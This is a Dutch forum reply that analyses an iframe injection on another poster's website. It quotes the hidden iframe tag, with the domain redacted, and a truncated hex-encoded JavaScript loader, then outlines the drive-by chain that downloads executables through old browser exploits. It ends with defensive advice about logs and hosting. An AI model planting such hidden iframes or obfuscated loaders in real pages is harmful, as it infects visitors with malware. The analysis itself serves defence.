die code zorgt voor een iframe injectie
code:
1
| <iframe src="http://www. - deleted for security - .com/z/static.php" height="2" style="display:none" width="2"></iframe> |
(die 'if' weghalen en de document.write vervangen door een alert
- of voor de if "alert(unescape(o));" tussen voegen en die if + doc.write verwijderen)
dus waarschijnlijk heb je last van een bot die een exploit gevonden heeft in je code.
kijk dus even je logfiles na om te kijken hoe ze die code die jij geeft posten (en dus injecteren) in de jouwe...
en die static.php geeft weer soortgelijke code af, die een pak langer is:
code:
1
2
3
| <script> var s='3C48544D4C20786D6C6E733A49453E0A
---- en dit gaat door voor een paar a4's ----
F424F44593E0A3C2F48544D4C3E'; var o=''; for(i=0;i<s.length;i=i+2) { o=o+'%'+s.substr(i,2);} document.write(unescape(o)); |
en die code zorgt dan weer voor een exploit mbv een xmlhttprequest en een ad2bdstreansave-exploit gevolgd door een shellexecute is het een manier om botnetjes uit te breiden, spyware te verspreiden, ...
dus maw: tijdelijk offline halen de site als dat mogelijk is, code en vooral logs doorspitten - vooral de 'get....' en dan eens kijken hoe ze dat doen. 't kan net zo goed via een andere site op die server zijn dat het gebeurd.
(ik probeer nog wat verder te zien van waar ze hunne rommel afhalen)
ps: in 't geval de code via een andere site gehost op die server geinjecteerd wordt in jouw site, dan kan je die webmaster en de hostingsmaatschappij verantwoordelijk stellen:
die webmaster omdat die exploitbare code draait... (hij moet dat maar verder verhalen op de veroorzaker/hacker/scriptkiddie - maar te zien aan de code is het niet echt een kiddie die erachter zit)
hostingsboer omdat ie niet zorgt voor voldoende beveiliging tussen de verschillende site's op zijn server...
ps: de .com waar de eerste code hene verwees is al offline - of toch al niet meer voor mij bereikbaar...
pech voor hen heb ik onmiddellijk een offline copy van de code gemaakt waar ik nu mee verder zoek
volgende stap is via een ajaxrequest en de bekende adobd.stream-exploit een .exe afhalen via zelfde site maar ander script
code:
1
| http://www. - deleted for security - .com/z/ex.php |
en die opslaan in temp-map als mbroit.exe grootte = 68kB( achter die .exe dus even zoeken op je pc na bezoek aan je site - vooral met IE als browser)
en via een volgende functie en exploit wordt via die zelfde link "ex.php?n1" een andere exe opgehaald van 76kB
code zegt wel schoon wat ze exploiten

(verschillende .jar's worden telkens meegebruikt enzo...)
en uiteindelijk komt er ook nog een link voorbij die tot een overbekend russisch network hoort befaamd voor exploits, spam, spyware, ... waarbij de link een weppagina geeft met een hoop popunders's en de pagina zelf volstaat met ads en zo...
'gaten' die gebruikt worden:
jvm [>1].*.[<3810]
ms03011
ms06014
ms05001
en zit je met een firefox van voor versie 1.0.5 dan wordt je enkel naar een adv.-site verwezen (waar wrs nog steeds een hoop exploits op je wachten)
en alle andere gevallen krijg je er ook nog eens
ms06006 over je
maar de TS kan al zeker zijn dat het virus niet op zijn site staat, maar enkel de geinjecteerde code van de beginnende iframe

- vervelend genoeg wijst die door naar een hoop exploits en dergelijke dus heeft de TS er alle profijt bij die iframe uit zijn code te krijgen en te houden.
(ik kon het niet laten de hele code te doorspitten ,en dan ben ik nog alle .jar's vergeten op te vragen en te bekijken)
en TS: kan je even zeggen op welke code je site draait ?
je kan altijd eens kijken op bekende exploit-lijst-site's en de site van de producent of er exploits/injects/xss/... bekend zijn en/of er oplossingen voor zijn om dat te voorkomen (ev. een nieuwere versie)
dus geef ons aub iets meer informatie dan het karige dat we nu hebben...
[
Voor 112% gewijzigd door
soulrider op 29-09-2008 18:27
. Reden: telkens aangevuld met een volgende stap in de code - en nadien enkele typo's eruit gehaald ]